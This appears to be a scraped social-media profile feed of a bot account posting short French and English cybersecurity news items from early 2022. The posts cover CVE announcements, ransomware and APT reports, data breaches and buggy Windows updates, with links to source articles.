yaracroft @venom@nanao.cybtex.fr
- mnt-by
- @socat
Robot
sc(r)apy | full metal packets
> We Are the Borg
> You Will be Assimilated
> Resistance is Futile
Inscrit·e en mar. 2021
Le nombre de vulnérabilités ICS signalées a bondi de +110% au cours des 4 dernières années #vuln #cyber #threats #informatique
An unusual XSS vulnerability in the Horde webmailer. The vulnerability allows an attacker to craft a malicious OpenOffice document that, when previewed as an email attachment, enables an attacker to steal all emails from the victim. Since there is no official patch available yet, we highly recommend to disable the affected feature #vuln #informatique
https://blog.sonarsource.com/horde-webmail-account-takeover-via-email
UNC2596 observed leveraging vulnerabilities to deploy #Cuba #ransomware. Beyond commonplace tools, like Cobalt Strike BEACON and NetSupport, UNC2596 has used novel #malware, including BURNTCIGAR to disable endpoint protection, WEDGECUT to enumerate active hosts, and the BUGHATCH custom downloader. COLDDRAW ransomware operations have impacted dozens of organizations across more than ten countries, including those within critical infrastructure. Wedgecut, Bughatch, Burntcigar #microsoft #mail #vuln #cyber #threats #informatique
A chinese security firm « Pangu Lab » pulished a report about a top-tier APT backdoor now tracked as Bvp47 that is linked to the Equation Group, the advanced persistent threat actor tied to the NSA. Bvp47 survived until today almost undetected, despite being submitted to the Virus Total antivirus database for the first time close to a decade ago, in late 2013. The tool is well-designed, powerful, and widely adapted. Its network attack capability equipped by 0day vulnerabilities was unstoppable, and its data acquisition under covert control was with little effort. Pangu Lab has a code named « Operation Telescreen » for several Bvp47 incidents. Telescreen is a device imagined by British writer George Orwell in his novel « 1984 ». #usa #networks #nsa #snowden #linux #vuln #0day #backdoor #cyber #apt #network #threats #informatique
https://www.pangulab.cn/en/post/the_bvp47_a_top-tier_backdoor_of_us_nsa_equation_group/
🔥 CVE-2022-24086 : Successful exploitation could lead to RCE from an unauthenticated user in Magento Open Source and Adobe Commerce.
https://threatpost.com/new-critical-rce-bug-found-in-adobe-commerce-magento/178554/
💥 CVE-2022-22620 : peut permettre la prise de contrôle à distance de nombreux appareils Apple. La vulnérabilité affecte les modèles anciens ainsi que les plus récents. Cette vulnérabilité est déjà exploitée ITW. #apple #vuln #ios #macos #iphone #ipod #ipad #mac #macbook #imac #safari #cyber #threats #informatique
Attaque informatique sur MacGeneration (macg.co). Les attaquants ont exploité une faille dans un module tiers pour pénétrer dans l'infrastructure, et accéder au serveur de bases de données. Les informations de 102 262 membres ont été compromises. #apple #vuln #france #databreach #cyber #threats #informatique
https://www.macg.co/macgeneration/2022/02/macgeneration-victime-dune-attaque-informatique-127149
🔔 CVE-2022-20653 : A vulnerability in the DNS-based Authentication of Named Entities (DANE) email verification component of Cisco AsyncOS Software for Cisco Email Security Appliance (ESA) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-dos-MxZvGtgU
🔥 Threat actors are actively exploiting CVE-2022-21882 - #Microsoft Win32k Privilege Escalation Vulnerability #windows #vuln #informatique
Discovery of 23 high-impact vulnerabilities in one of the major Independent BIOS Developers (IBV) #software. These vulnerabilities impact not only a single vendor, but all the vendors who adopted the IBV code into their #UEFI #firmware software. The verified list of impacted vendors consists of : #Fujitsu, #Siemens, #Dell, #HP, #HPE, #Lenovo, #Microsoft, #Intel and #Bull #Atos. #vuln #informatique
https://www.binarly.io/posts/An_In_Depth_Look_at_the_23_High_Impact_Vulnerabilities/index.html
CVE-2021-40724 - RCE in Adobe Acrobat Reader for android #vuln #informatique
Un jeune allemand de 19 ans, David Colombo, spécialiste en sécurité informatique a discrètement piraté plusieurs Tesla situées à l'autre bout du monde. Résultat, il pouvait réaliser à distance tout un tas d'actions plus impressionnantes les unes que les autres. #allemagne #hackers #vuln #tesla #automotive #cyber #threats #informatique
https://iphonesoft.fr/2022/01/12/hackeur-allemand-prendre-controle-25-tesla-distance
A teenage security researcher, David Colombo, claimed that he can remotely control various functions in 25 Teslas across 13 countries. Tesla #germany #hackers #vuln #tesla #automotive #cyber #threats #informatique
https://www.nasdaq.com/articles/teenage-researcher-claims-control-over-25-teslas
New Windows Server updates cause DC boot loops, break Hyper-V. The most serious issue introduced by these #updates is that Windows Domain Controllers enter a boot loop, with servers getting into an endless cycle of #Windows starting and then rebooting after a few minutes. After installing Microsoft Updates, #Windows Resilient File System (ReFS) volumes are no longer accessible or are seen as RAW (unformatted) after installing the updates. In addition to the boot loops, Hyper-V no longer starts on the server. Microsoft released security updates to fix four different Hyper-V vulnerabilities yesterday (CVE-2022-21901, CVE-2022-21900, CVE-2022-21905, and CVE-2022-21847), which are likely causing this issue. #vuln #microsoft #windows #bugs #informatique
KB5009543 & KB5009566 - After installing #Microsoft Updates, #Windows users find their L2TP VPN connections broken when attempting to connect using the Windows #VPN client. For the moment, it is not clear what caused the « bug ». #vuln #internet #informatique
La plus grande plateforme de NFT sportifs Lympo (lympo.io) victime d'une attaque informatique. 165,2 millions de tokens LMT ($18.7 million) ont été volés suite à l'exploitation d'une faille de sécurité. #vuln #cryptocurrencies #threats #informatique
https://medium.com/lympo-official/community-update-2-85805b0555ce
( CVE-2021-20038 | CVE-2021-20039 | CVE-2021-20040 | CVE-2021-20041 | CVE-2021-20042 ) - SonicWall SMA 100 Multiple Vulnerabilities. As these devices are designed to be exposed to the internet, the only effective remediation for these issues is to apply the vendor-supplied updates. #sonicwall #devices #vuln #software #threats #informatique
Microsoft today released updates to plug nearly 120 security holes in Windows and supported #software. The most severe flaw addressed today is 🔥 CVE-2022-21907, a critical, Remote Code Execution flaw in the « HTTP Protocol Stack » (HTTP.sys) Microsoft says the flaw affects Windows 10 and Windows 11, as well as Server 2019 and Server 2022.. #vuln #microsoft #windows #threats #informatique
https://krebsonsecurity.com/2022/01/wormable-flaw-leads-january-2022-patch-tuesday/
APT35 (aka Charming Kitten, TA453, Phosphorus), which is suspected to be an Iranian nation-state actor, exploits Log4j vulnerability (CVE-2021-44228) to distribute new modular #Windows #PowerShell toolkit.
#usa #iran #cyber #microsoft #software #vuln #backdoor #malware #informatique
- mnt-by
- @socat
Robot
sc(r)apy | full metal packets
> We Are the Borg
> You Will be Assimilated
> Resistance is Futile
Inscrit·e en mar. 2021
yaracroft recommande :
